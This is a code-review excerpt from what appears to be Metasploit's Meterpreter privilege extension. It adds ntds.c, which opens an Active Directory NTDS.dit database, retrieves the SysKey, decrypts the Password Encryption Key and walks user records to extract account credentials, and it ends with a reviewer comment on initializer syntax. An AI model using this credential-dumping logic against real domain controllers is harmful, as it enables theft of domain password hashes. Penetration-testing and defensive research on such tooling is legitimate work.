source/extensions/priv/server/ntds.c

```diff
@@ -0,0 +1,215 @@
+DWORD ntds_parse(Remote *remote, Packet *packet){
+	Packet *response = packet_create_response(packet);
+	DWORD res = ERROR_SUCCESS;
+	jetState *ntdsState = malloc(sizeof(jetState));
+	PCHAR filePath = packet_get_tlv_value_string(packet, TLV_TYPE_NTDS_PATH);
+	// Check if the File exists
+	if (0xffffffff == GetFileAttributes(filePath)){
+		res = 2;
+		goto out;
+	}
+	strncpy(ntdsState->ntdsPath, filePath, 255);
+
+	// Attempt to get the SysKey from the Registry
+	unsigned char sysKey[17];
+	if (!get_syskey(sysKey)){
+		res = GetLastError();
+		goto out;
+	}
+
+
+	// Create the structure for holding all of the Column Definitions we need
+	ntdsColumns *accountColumns = malloc(sizeof(ntdsColumns));
+	memset(accountColumns, 0, sizeof(ntdsColumns));
+
+	JET_ERR startupStatus = engine_startup(ntdsState);
+	if (startupStatus != JET_errSuccess){
+		exit(startupStatus);
+	}
+	// Start a Session in the Jet Instance
+	JET_ERR sessionStatus = JetBeginSession(ntdsState->jetEngine, &ntdsState->jetSession, NULL, NULL);
+	if (sessionStatus != JET_errSuccess){
+		JetTerm(ntdsState->jetEngine);
+		res = sessionStatus;
+		goto out;
+	}
+	JET_ERR openStatus = open_database(ntdsState);
+	if (openStatus != JET_errSuccess){
+		JetEndSession(ntdsState->jetSession, (JET_GRBIT)NULL);
+		JetTerm(ntdsState->jetEngine);
+		res = openStatus;
+		goto out;
+	}
+	JET_ERR tableStatus = JetOpenTable(ntdsState->jetSession, ntdsState->jetDatabase, "datatable", NULL, 0, JET_bitTableReadOnly | JET_bitTableSequential, &ntdsState->jetTable);
+	if (tableStatus != JET_errSuccess){
+		engine_shutdown(ntdsState);
+		res = tableStatus;
+		goto out;
+	}
+	JET_ERR columnStatus = get_column_info(ntdsState, accountColumns);
+	if (columnStatus != JET_errSuccess){
+		engine_shutdown(ntdsState);
+		res = columnStatus;
+		goto out;
+	}
+	JET_ERR pekStatus;
+	encryptedPEK *pekEncrypted = malloc(sizeof(encryptedPEK));
+	decryptedPEK *pekDecrypted = malloc(sizeof(decryptedPEK));
+	memset(pekEncrypted, 0, sizeof(encryptedPEK));
+	memset(pekDecrypted, 0, sizeof(decryptedPEK));
+
+	// Get and Decrypt the Password Encryption Key (PEK)
+	pekStatus = get_PEK(ntdsState, accountColumns, pekEncrypted);
+	if (pekStatus != JET_errSuccess){
+		res = pekStatus;
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	if (!decrypt_PEK(sysKey, pekEncrypted, pekDecrypted)){
+		res = GetLastError();
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	// Set our Cursor on the first User record
+	JET_ERR cursorStatus = find_first(ntdsState);
+	if (cursorStatus != JET_errSuccess){
+		res = cursorStatus;
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	cursorStatus = next_user(ntdsState, accountColumns);
+	if (cursorStatus != JET_errSuccess){
+		res = cursorStatus;
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+
+	// If we made it this far, it's time to set up our channel
+	PoolChannelOps chops;
+	Channel *newChannel;
+	memset(&chops, 0, sizeof(chops));

```

Comment:
Can we use designated initializers in visual studio yet? If so, this can be simplified to:

PoolChannelOps chops = 
    .native.context = ctx,
    .native.write = ntds_channel_write,
    .native.close = ntds_channel_close,
    .eof = ntds_channel_eof,
    .read = ntds_channel_read,
};